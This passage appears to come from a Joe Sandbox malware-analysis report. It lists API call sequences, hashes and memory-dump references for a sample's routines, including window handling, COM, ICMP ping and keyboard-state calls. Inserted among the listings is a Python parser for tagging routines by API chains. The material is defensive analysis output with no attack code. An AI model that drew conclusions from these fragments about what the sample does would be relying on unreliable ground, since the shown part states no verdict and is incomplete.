                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: State$Async$Keyboard
                                              • String ID:
                                              • API String ID: 541375521-0
                                              • Opcode ID: 59fbd1abfba40131e06bbab54a562353ee3bde65a534801da4dd35fa8e371551
                                              • Instruction ID: 1bae88b9a828e8a7cc26f92eb81b0099f98dc460c72797bfce103ad3c156a713
                                              • Opcode Fuzzy Hash: 59fbd1abfba40131e06bbab54a562353ee3bde65a534801da4dd35fa8e371551
                                              • Instruction Fuzzy Hash: 1651D7309047CC69EB35DBA288547EABFF49F11344F4C95ADC5C62B1C3DA54AA4CC762
                                              APIs
                                              • GetDlgItem.USER32(?,00000001), ref: 00EE6571
                                              • GetWindowRect.USER32(00000000,?), ref: 00EE658A
                                              • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00EE65E8
                                              • GetDlgItem.USER32(?,00000002), ref: 00EE65F8
                                              • GetWindowRect.USER32(00000000,?), ref: 00EE660A
                                              • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00EE665E
                                              • GetDlgItem.USER32(?,000003E9), ref: 00EE666C
                                              • GetWindowRect.USER32(00000000,?), ref: 00EE667E
                                              • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00EE66C0
                                              • GetDlgItem.USER32(?,000003EA), ref: 00EE66D3
                                              • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00EE66E9
                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 00EE66F6
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: Window$ItemMoveRect$Invalidate
                                              • String ID:
                                              • API String ID: 3096461208-0
                                              • Opcode ID: ff44dc90fc88892c629aaf81fa688952509a440729546ea0b4206d9ee7e89c16
                                              • Instruction ID: e6307ef564cab8b2e7400926f5ad4c833c7ed570363fa45c17e19c7190fd3c09
                                              • Opcode Fuzzy Hash: ff44dc90fc88892c629aaf81fa688952509a440729546ea0b4206d9ee7e89c16
                                              • Instruction Fuzzy Hash: 125141B0B10219AFDF08CF69DD99AAEBBB5FB58304F118129F919E7290D7709D04CB50
                                              APIs
                                                • Part of subcall function 00E821E4: GetWindowLongW.USER32(?,000000EB), ref: 00E821F2
                                              • GetSysColor.USER32(0000000F), ref: 00E82102
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: ColorLongWindow
                                              • String ID:
                                              • API String ID: 259745315-0
                                              • Opcode ID: ec3f93a1554c3ccc8c81bd91a6f1250f997411fb7a2f67bae336c89cad0afdfa
                                              • Instruction ID: 05e9950d19af9583c6415d4f53874925df03abb7d3c7fdff079b36f8104d1ca0
                                              • Opcode Fuzzy Hash: ec3f93a1554c3ccc8c81bd91a6f1250f997411fb7a2f67bae336c89cad0afdfa
                                              • Instruction Fuzzy Hash: 6C41C831101654AFDB206F389C48BBA7775AB45324F25964DFBAAA72E1C7318D42D710
                                              APIs
                                              • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00F1499A
                                              • CreateCompatibleDC.GDI32(00000000), ref: 00F149A1
                                              • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00F149B4
                                              • SelectObject.GDI32(00000000,00000000), ref: 00F149BC
                                              • GetPixel.GDI32(00000000,00000000,00000000), ref: 00F149C7
                                              • DeleteDC.GDI32(00000000), ref: 00F149D1
                                              • GetWindowLongW.USER32(?,000000EC), ref: 00F149DB
                                              • SetLayeredWindowAttributes.USER32(?,?,00000000,00000001,?,00000000,?), ref: 00F149F1
                                              • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?), ref: 00F149FD
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                              • String ID: static
                                              • API String ID: 2559357485-2160076837
                                              • Opcode ID: 4aabdf02ce78fe88eaeacc8d866ff558ea18af675fb732efb711aba4ffc972ce
                                              • Instruction ID: 728a2b1bce071973826d74f27d9d38602c8260949561160dd758e5959dff8fe9
                                              • Opcode Fuzzy Hash: 4aabdf02ce78fe88eaeacc8d866ff558ea18af675fb732efb711aba4ffc972ce
                                              • Instruction Fuzzy Hash: 44318C32500219BBDF119FA4CC08FDB3BB9FF49364F124211FA68A60A0C735E851EBA4
                                              APIs
                                              • VariantInit.OLEAUT32(?), ref: 00F045B9
                                              • CoInitialize.OLE32(00000000), ref: 00F045E7
                                              • CoUninitialize.OLE32 ref: 00F045F1
                                              • _wcslen.LIBCMT ref: 00F0468A
                                              • GetRunningObjectTable.OLE32(00000000,?), ref: 00F0470E
                                              • SetErrorMode.KERNEL32(00000001,00000029), ref: 00F04832
                                              • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00F0486B
                                              • CoGetObject.OLE32(?,00000000,00F20B64,?), ref: 00F0488A
                                              • SetErrorMode.KERNEL32(00000000), ref: 00F0489D
                                              • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00F04921
                                              • VariantClear.OLEAUT32(?), ref: 00F04935
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                                              • String ID:
                                              • API String ID: 429561992-0
                                              • Opcode ID: b8a32471f60ea002f53b5aa3d5890faceff94456548b9dd4ae9bf116831ccc75
                                              • Instruction ID: 51ba76a519d706a28f6374b8c8f4514538e5f8818f80ccf1615fd61560a1303b
                                              • Opcode Fuzzy Hash: b8a32471f60ea002f53b5aa3d5890faceff94456548b9dd4ae9bf116831ccc75
                                              • Instruction Fuzzy Hash: DBC156B1604305AFD700DF28C88496BB7E9FF89758F14491DFA899B290DB71EC05EB52
                                              APIs
                                              • CoInitialize.OLE32(00000000), ref: 00EF844D
                                              • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00EF84E9
                                              • SHGetDesktopFolder.SHELL32(?), ref: 00EF84FD
                                              • CoCreateInstance.OLE32(00F20CD4,00000000,00000001,00F47E8C,?), ref: 00EF8549
                                              • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00EF85CE
                                              • CoTaskMemFree.OLE32(?,?), ref: 00EF8626
                                              • SHBrowseForFolderW.SHELL32(?), ref: 00EF86B1
                                              • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00EF86D4
                                              • CoTaskMemFree.OLE32(00000000), ref: 00EF86DB
                                              • CoTaskMemFree.OLE32(00000000), ref: 00EF8730
                                              • CoUninitialize.OLE32 ref: 00EF8736
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                              • String ID:
                                              • API String ID: 2762341140-0
                                              • Opcode ID: dfd0874f65fe91f3915e7ea859cac414c041af7388e430725a4f538214fe12c5
                                              • Instruction ID: 6ef31031035ed85dd98f169a472b074447dd28e1a66b15655d2ab947c7b25991
                                              • Opcode Fuzzy Hash: dfd0874f65fe91f3915e7ea859cac414c041af7388e430725a4f538214fe12c5
                                              • Instruction Fuzzy Hash: D4C11A75A00109AFCB14DFA4C984DAEBBF9FF48344B159099E519EB261DB30ED45CB90
                                              APIs
                                              • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00EE033F
                                              • SafeArrayAllocData.OLEAUT32(?), ref: 00EE0398
                                              • VariantInit.OLEAUT32(?), ref: 00EE03AA
                                              • SafeArrayAccessData.OLEAUT32(?,?), ref: 00EE03CA
                                              • VariantCopy.OLEAUT32(?,?), ref: 00EE041D
                                              • SafeArrayUnaccessData.OLEAUT32(?), ref: 00EE0431
                                              • VariantClear.OLEAUT32(?), ref: 00EE0446
                                              • SafeArrayDestroyData.OLEAUT32(?), ref: 00EE0453
                                              • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00EE045C
                                              • VariantClear.OLEAUT32(?), ref: 00EE046E
                                              • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00EE0479
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                              • String ID:
                                              • API String ID: 2706829360-0
                                              • Opcode ID: 55a63f78a41ebcd64a4db748ad03b5d7980ede9fef401f0b0f03f103b12e1d65
                                              • Instruction ID: ab53106b7e473fa31fb5196b17e84e75e8056fba66f15a8239904c6b1995a10c
                                              • Opcode Fuzzy Hash: 55a63f78a41ebcd64a4db748ad03b5d7980ede9fef401f0b0f03f103b12e1d65
                                              • Instruction Fuzzy Hash: 4B416F75A0021DDFCB04DFA5C8449EEBBB9FF48344F018029E959B7261CB74A985DFA0
                                              APIs
                                                • Part of subcall function 00E82441: GetWindowLongW.USER32(00000000,000000EB), ref: 00E82452
                                              • GetSystemMetrics.USER32(0000000F), ref: 00F1A926
                                              • GetSystemMetrics.USER32(0000000F), ref: 00F1A946
                                              • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 00F1AB83
                                              • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00F1ABA1
                                              • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00F1ABC2
                                              • ShowWindow.USER32(00000003,00000000), ref: 00F1ABE1
                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 00F1AC06
                                              • DefDlgProcW.USER32(?,00000005,?,?), ref: 00F1AC29
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                              • String ID:
                                              • API String ID: 1211466189-3916222277
                                              • Opcode ID: c74c922b396a20698f416a0abdd70999cb369026bc95211989a7f9828266c908
                                              • Instruction ID: 9e1fc7e0c7b854f3cd6e4ee13326e2bf9b063efce28e55c9d4b190b8a3b43a0e
                                              • Opcode Fuzzy Hash: c74c922b396a20698f416a0abdd70999cb369026bc95211989a7f9828266c908
                                              • Instruction Fuzzy Hash: F6B19931A01219DFDF14CF68C9857EE7BB2BF84711F098069EC499B295D734A980EB61
                                              APIs
                                              • WSAStartup.WSOCK32(00000101,?), ref: 00F00F19
                                              • inet_addr.WSOCK32(?), ref: 00F00F79
                                              • gethostbyname.WSOCK32(?), ref: 00F00F85
                                              • IcmpCreateFile.IPHLPAPI ref: 00F00F93
                                              • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00F01023
                                              • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00F01042
                                              • IcmpCloseHandle.IPHLPAPI(?), ref: 00F01116
                                              • WSACleanup.WSOCK32 ref: 00F0111C
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                              • String ID: Ping
                                              • API String ID: 1028309954-2246546115
                                              • Opcode ID: f17965871b4aaeecf0ee7c2f7a81c6eed87c470e4a90c975410ce07a0e30f972
                                              • Instruction ID: 679a53ce6081f0f88f3cac186fcc93800a1d3bdfd608bad9027d5b57f946f13c
                                              • Opcode Fuzzy Hash: f17965871b4aaeecf0ee7c2f7a81c6eed87c470e4a90c975410ce07a0e30f972
                                              • Instruction Fuzzy Hash: 8591C031A04241AFD720DF15C885B16BBE4FF49328F1485A9F5A99B7E2C731EC85EB81
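The call listings above are the raw form in which the report presents each routine. As an added example, not part of the Joe Sandbox report or of the analysed sample, the Python below parses that format (one bullet per call, `Api.MODULE(args), ref: address`, with a `Part of subcall function` prefix for calls made through a callee) into records and shows two things a practitioner does with them: test a routine for an ordered API chain, and read the literal argument values out of a call. The sample text is copied from the Ping routine listed just above; the watch-list in `CHAINS` is an assumption I add for the demonstration, and `icmp_echo_params` relies on the documented IcmpSendEcho parameter order (RequestSize, ReplySize and Timeout are parameters 4, 7 and 8).

```python
"""Parse Joe Sandbox 'APIs' listings into structured routine records.

Added example for this report page; not Joe Sandbox code and not from the sample.
"""
import re
from dataclasses import dataclass, field
from typing import Optional

# Constructed sample: the ICMP echo routine as listed on this page.
SAMPLE = """\
APIs
• WSAStartup.WSOCK32(00000101,?), ref: 00F00F19
• inet_addr.WSOCK32(?), ref: 00F00F79
• gethostbyname.WSOCK32(?), ref: 00F00F85
• IcmpCreateFile.IPHLPAPI ref: 00F00F93
• IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00F01023
• IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00F01042
• IcmpCloseHandle.IPHLPAPI(?), ref: 00F01116
• WSACleanup.WSOCK32 ref: 00F0111C
Similarity
• API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
• String ID: Ping
• API String ID: 1028309954-2246546115
"""

# One call line: optional subcall prefix, Api.MODULE, optional (args), ref: address.
CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<mod>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
# Key/value bullets such as '• String ID: Ping' or '• API ID: ...'.
META_RE = re.compile(r"^\s*•\s*(?P<key>[A-Za-z ]+?):\s*(?P<val>.*)$")


def parse_arg(tok: str):
    """'?' -> None (unknown at analysis time), 8-digit hex -> int, anything else -> literal string."""
    tok = tok.strip()
    if tok in ("", "?"):
        return None
    if re.fullmatch(r"-?[0-9A-Fa-f]{8}", tok):
        return int(tok, 16)          # int('-00000005', 16) == -5
    return tok


@dataclass
class ApiCall:
    api: str
    module: str
    args: list                       # decoded by parse_arg
    ref: int                         # call-site address
    subcall: Optional[int] = None    # callee address when listed as 'Part of subcall function'


@dataclass
class Routine:
    calls: list = field(default_factory=list)
    meta: dict = field(default_factory=dict)   # 'API ID', 'String ID', 'API String ID', ...

    def apis(self):
        return [c.api for c in self.calls]

    def contains_chain(self, chain):
        """True if every API in chain occurs in this routine in that order (not necessarily adjacent)."""
        it = iter(self.apis())
        return all(any(api == want for api in it) for want in chain)


def parse_report(text: str):
    """Split the dump into Routine records; a new record starts at each bare 'APIs' line."""
    routines, cur = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":
            cur = Routine()
            routines.append(cur)
            continue
        if cur is None:
            continue
        m = CALL_RE.match(line)
        if m:
            args = [parse_arg(a) for a in m["args"].split(",")] if m["args"] is not None else []
            cur.calls.append(ApiCall(m["api"], m["mod"], args, int(m["ref"], 16),
                                     int(m["sub"], 16) if m["sub"] else None))
            continue
        m = META_RE.match(line)
        if m:
            cur.meta[m["key"]] = m["val"]
    return routines


# Assumed watch-list of ordered API chains worth tagging during triage (extend as needed).
CHAINS = {
    "icmp_ping": ["IcmpCreateFile", "IcmpSendEcho", "IcmpCloseHandle"],
    "com_moniker_bind": ["CoInitialize", "CoGetObject"],
    "safearray_marshal": ["SafeArrayAllocDescriptorEx", "SafeArrayAccessData", "SafeArrayUnaccessData"],
}


def tag_routine(r: Routine):
    return sorted(name for name, chain in CHAINS.items() if r.contains_chain(chain))


def icmp_echo_params(r: Routine):
    """(RequestSize, ReplySize, Timeout ms) from the first IcmpSendEcho call, per its documented signature."""
    for c in r.calls:
        if c.api == "IcmpSendEcho" and len(c.args) == 8:
            return c.args[3], c.args[6], c.args[7]
    return None


def triage(text: str):
    """Map each routine (keyed by its first call-site address) to its chain tags."""
    return {f"{r.calls[0].ref:08X}": tag_routine(r) for r in parse_report(text) if r.calls}


if __name__ == "__main__":
    print(triage(SAMPLE))
    print(icmp_echo_params(parse_report(SAMPLE)[0]))
```

Run against the Ping routine this returns a request size of 5, a reply buffer of 0x29 (41) bytes and a 4000 ms timeout, which is exactly what the `00000005,...,00000029,00000FA0` arguments in the listing encode; the `?` placeholders stay `None` because the sandbox could not resolve them statically. Tagging routines by chain is the quick way to find the handful worth reading in a dump of this size.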
                                              APIs
                                              • GetLocalTime.KERNEL32(?), ref: 00EF8BB1
                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00EF8BC1
                                              • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00EF8BCD
                                              • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00EF8C6A
                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00EF8C7E
                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00EF8CB0
                                              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00EF8CE6
                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00EF8CEF
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: CurrentDirectoryTime$File$Local$System
                                              • String ID: *.*
                                              • API String ID: 1464919966-438819550
                                              • Opcode ID: 70e1ad87512a37a44cab607e38352e2a877acae2c5be3bcb033806be2863b90e
                                              • Instruction ID: 3be00e819339acac85aa88a1121d3da908d0190f66ac3b1bd8b61b4860ab25c2
                                              • Opcode Fuzzy Hash: 70e1ad87512a37a44cab607e38352e2a877acae2c5be3bcb033806be2863b90e
                                              • Instruction Fuzzy Hash: C3617BB25043499FCB10EF60C9449AFB3E8FF89314F04981EFA99A7251DB31E945CB92
                                              APIs
                                              • CreateMenu.USER32 ref: 00F145D8
                                              • SetMenu.USER32(?,00000000), ref: 00F145E7
                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00F1466F
                                              • IsMenu.USER32(?), ref: 00F14683
                                              • CreatePopupMenu.USER32 ref: 00F1468D
                                              • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00F146BA
                                              • DrawMenuBar.USER32 ref: 00F146C2
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                              • String ID: 0$F
                                              • API String ID: 161812096-3044882817
                                              • Opcode ID: e9defe78cd80c56b33e2649f514f4c517ac037464e2b0cba5b8be5a57c449e00
                                              • Instruction ID: 86a3b97e7b9bf3b81599c3fdb365291bdd36cdfabe5662cbaf894ffcbc0a91c2
                                              • Opcode Fuzzy Hash: e9defe78cd80c56b33e2649f514f4c517ac037464e2b0cba5b8be5a57c449e00
                                              • Instruction Fuzzy Hash: 2A414D75A01209EFDF14CF64D854AEABBB5FF4A328F154028FA45A7350D731A960EF50
                                              APIs
                                                • Part of subcall function 00E8B25F: _wcslen.LIBCMT ref: 00E8B269
                                                • Part of subcall function 00EE4536: GetClassNameW.USER32(?,?,000000FF), ref: 00EE4559
                                              • SendMessageW.USER32(?,0000018C,000000FF,00020000), ref: 00EE27F4
                                              • GetDlgCtrlID.USER32 ref: 00EE27FF
                                              • GetParent.USER32 ref: 00EE281B
                                              • SendMessageW.USER32(00000000,?,00000111,?), ref: 00EE281E
                                              • GetDlgCtrlID.USER32(?), ref: 00EE2827
                                              • GetParent.USER32(?), ref: 00EE283B
                                              • SendMessageW.USER32(00000000,?,00000111,?), ref: 00EE283E
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                              • String ID: ComboBox$ListBox
                                              • API String ID: 711023334-1403004172
                                              • Opcode ID: 1d24b473b8713c9298cf77834ebceb724cea91c2fe777abbf99a2d703b29209f
                                              • Instruction ID: bb161ba826abf0b8552d2b4f6b61cc4af007585dbdd7b587c210e93ddbd8ed52
                                              • Opcode Fuzzy Hash: 1d24b473b8713c9298cf77834ebceb724cea91c2fe777abbf99a2d703b29209f
                                              • Instruction Fuzzy Hash: CB21C274D0021CBBCF15AFA1CC85EEEBBB8EF15310B00511ABA55A72E6DB795809DB60
                                              APIs
                                                • Part of subcall function 00E8B25F: _wcslen.LIBCMT ref: 00E8B269
                                                • Part of subcall function 00EE4536: GetClassNameW.USER32(?,?,000000FF), ref: 00EE4559
                                              • SendMessageW.USER32(?,00000186,00020000,00000000), ref: 00EE28D3
                                              • GetDlgCtrlID.USER32 ref: 00EE28DE
                                              • GetParent.USER32 ref: 00EE28FA
                                              • SendMessageW.USER32(00000000,?,00000111,?), ref: 00EE28FD
                                              • GetDlgCtrlID.USER32(?), ref: 00EE2906
                                              • GetParent.USER32(?), ref: 00EE291A
                                              • SendMessageW.USER32(00000000,?,00000111,?), ref: 00EE291D
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmp
